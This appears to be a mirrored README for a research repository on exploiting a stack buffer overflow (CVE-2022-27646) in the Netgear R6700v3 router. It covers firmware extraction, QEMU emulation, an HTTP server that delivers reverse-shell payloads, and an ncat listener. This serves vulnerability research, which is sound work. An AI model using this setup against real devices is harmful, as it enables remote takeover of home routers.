2023-11-16 15:16:09 +01:00
2023-11-16 15:13:02 +01:00
2023-10-05 15:31:29 +02:00
2023-11-16 10:30:37 +01:00
2023-11-16 15:12:15 +01:00
2023-11-16 15:13:55 +01:00
2023-11-16 15:12:37 +01:00
2023-09-07 15:32:05 +02:00
2023-11-16 15:16:09 +01:00

Exploiting a Stack Buffer Overflow on the Netgear R6700v3 (CVE-2022-27646)

1. Setup

1.1 Host System

  • Install the following dependencies:
  • Clone the repository:
    git clone https://github.com/pdamian/netgear_r6700v3_circled.git && cd netgear_r6700v3_circled/
    
  • Extract the R6700v3 firmware with binwalk:
    binwalk -e -M -C firmware/ firmware/R6700v3-V1.0.4.120_10.0.91.zip
    
  • Copy the following files to the firmware's root filesystem:
    # Variable to the root filesystem
    export ROOTFS="$(pwd)/firmware/_R6700v3-V1.0.4.120_10.0.91.zip.extracted/_R6700v3-V1.0.4.120_10.0.91.chk.extracted/squashfs-root"
    
    # Copy pre-built gdbserver binary (or compile your own statically-linked version)
    cp firmware/bins/gdbserver $ROOTFS/gdbserver
    
    # Copy pre-built libnvram.so library (or compile your own version)
    cp firmware/bins/libnvram.so $ROOTFS/libnvram.so
    
    # Copy pre-built libcircled.so library (or compile your own version)
    cp firmware/bins/libcircled.so $ROOTFS/libcircled.so
    
    # Patch the circled binary
    python3 firmware/circled.patch.py $ROOTFS/bin/circled $ROOTFS/bin/circled.patched
    
    # Copy circled.sh script
    cp firmware/circled.sh $ROOTFS/circled.sh
    
  • Copy the directories $ROOTFS/ and server/ to an ARMHF guest system (e.g. a QEMU ARMHF Debian VM).

1.2 ARMHF Guest System

  • In the following, we assume that the variable $ROOTFS points to the copied firmware's root filesystem.
  • Start the HTTP server delivering the payloads:
    # Using the default payloads triggering a reverse shell (use `--cmd` for a custom stage 0 payload)
    python3 server/circled.server.py
    
  • In case the HTTP server was started with the default stage 0 payload (i.e. without customizing --cmd), listen for the reverse shell coming in on TCP port 5001:
    server/bins/ncat -l -p 5001
    
  • Emulate the vulnerable circled binary:
    • Configure conservative ASLR as being used on the Netgear R6700v3:
      echo 1 | sudo tee /proc/sys/kernel/randomize_va_spac
      
    • Chroot into the root filesystem:
      sudo mount -t proc /proc/ $ROOTFS/proc/
      sudo mount -t sysfs /sys/ $ROOTFS/sys/
      sudo mount -o bind /dev/ $ROOTFS/dev/
      sudo chroot $ROOTFS/ /bin/sh
      
    • Execute the circled binary:
      export SHELL=/bin/sh
      
      # With GDB and therefore without ASRL (omit `--gdb` to run without GDB and with ASRL enabled)
      ./circled.sh --gdb
      

2. Morion Tracing

  • Trace crash (gdb-multiarch -q -x circled.gdb)

2. References

S
Description
Automated archival mirror of github.com/cyber-defence-campus/netgear_r6700v3_circled
Readme Apache-2.0
59 MiB
Languages
Python 60.2%
GDB 18.2%
C 10.6%
Shell 9.3%
Makefile 1.7%